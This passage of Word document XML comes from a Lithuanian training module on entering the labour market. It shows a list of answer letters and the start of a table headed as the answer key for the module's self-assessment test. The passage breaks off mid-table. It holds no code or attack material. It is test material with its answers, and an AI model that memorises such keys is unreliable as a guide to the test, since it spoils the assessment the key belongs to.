        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>A)</w:t>
      </w:r>
      <w:r w:rsidR="00BB54AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEF63A2" w14:textId="50C953BC" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="77A8712A" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>A)</w:t>
      </w:r>
      <w:r w:rsidR="00BB54AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FD0F2A" w14:textId="569E43EA" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="77A8712A" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>B)</w:t>
      </w:r>
      <w:r w:rsidR="00BB54AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9CADDB" w14:textId="10A04213" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="77A8712A" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>A)</w:t>
      </w:r>
      <w:r w:rsidR="00BB54AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CCA602" w14:textId="6F13931D" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="77A8712A" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>C)</w:t>
      </w:r>
      <w:r w:rsidR="00BB54AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE71D17" w14:textId="5CFFB2EC" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="77A8712A" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>B)</w:t>
      </w:r>
      <w:r w:rsidR="00BB54AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C6AD78" w14:textId="587FFD72" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="008263D8" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>C)</w:t>
      </w:r>
      <w:r w:rsidR="00BB54AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1700DABE" w14:textId="412AE5F7" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="77A8712A" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>A)</w:t>
      </w:r>
      <w:r w:rsidR="00BB54AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0E61E2" w14:textId="3A1691FA" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="77A8712A" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>A)</w:t>
      </w:r>
      <w:r w:rsidR="00BB54AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665B135B" w14:textId="62B1024D" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="00B0488D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB23F61" w14:textId="77777777" w:rsidR="009F77D4" w:rsidRPr="005A5C28" w:rsidRDefault="009F77D4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71450FC3" w14:textId="77777777" w:rsidR="001A5FFF" w:rsidRPr="005A5C28" w:rsidRDefault="001A5FFF" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC5F00D" w14:textId="20DD9FB8" w:rsidR="00255C8D" w:rsidRPr="005A5C28" w:rsidRDefault="00255C8D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „Įvadas į darbo rinką“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D96EB68" w14:textId="2FEA986A" w:rsidR="00255C8D" w:rsidRPr="005A5C28" w:rsidRDefault="00255C8D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="244A70FA" w14:textId="600399D5" w:rsidR="00255C8D" w:rsidRPr="005A5C28" w:rsidRDefault="00BD48CE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>TESTAS ĮSIVERTINTI GEBĖJIMAMS BAIGUS PROGRAMA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5638B025" w14:textId="77777777" w:rsidR="00BD48CE" w:rsidRPr="005A5C28" w:rsidRDefault="00BD48CE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56DCEBFA" w14:textId="05317A97" w:rsidR="0077219B" w:rsidRPr="005A5C28" w:rsidRDefault="0077219B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">TESTO </w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ATSAKYMAI</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE496AB" w14:textId="77777777" w:rsidR="00BB54AF" w:rsidRPr="005A5C28" w:rsidRDefault="00BB54AF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Lentelstinklelis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7"/>
        <w:gridCol w:w="2407"/>
        <w:gridCol w:w="2407"/>
        <w:gridCol w:w="2407"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3C448D86" w14:textId="77777777" w:rsidTr="00A203DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="40CF5F24" w14:textId="77777777" w:rsidR="00CD64DE" w:rsidRPr="005A5C28" w:rsidRDefault="00CD64DE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>Klausimo Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6E81BC38" w14:textId="77777777" w:rsidR="00CD64DE" w:rsidRPr="005A5C28" w:rsidRDefault="00CD64DE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>Teisingas atsakymas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="021EAFE0" w14:textId="77777777" w:rsidR="00CD64DE" w:rsidRPr="005A5C28" w:rsidRDefault="00CD64DE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>Klausimo Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6E4DDDD8" w14:textId="77777777" w:rsidR="00CD64DE" w:rsidRPr="005A5C28" w:rsidRDefault="00CD64DE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>Teisingas atsakymas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7D124669" w14:textId="77777777" w:rsidTr="00A203DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2CF6275F" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7A512B3E" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="16F4F185" w14:textId="565B3B3A" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4DE248DE" w14:textId="04FC16D6" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="73E71006" w14:textId="77777777" w:rsidTr="00A203DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41241B36" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2134C434" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0057D3B7" w14:textId="4EAA69A2" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4461B845" w14:textId="7AA33893" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="27CC893E" w14:textId="77777777" w:rsidTr="00A203DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="025EA00F" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="032F05E4" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
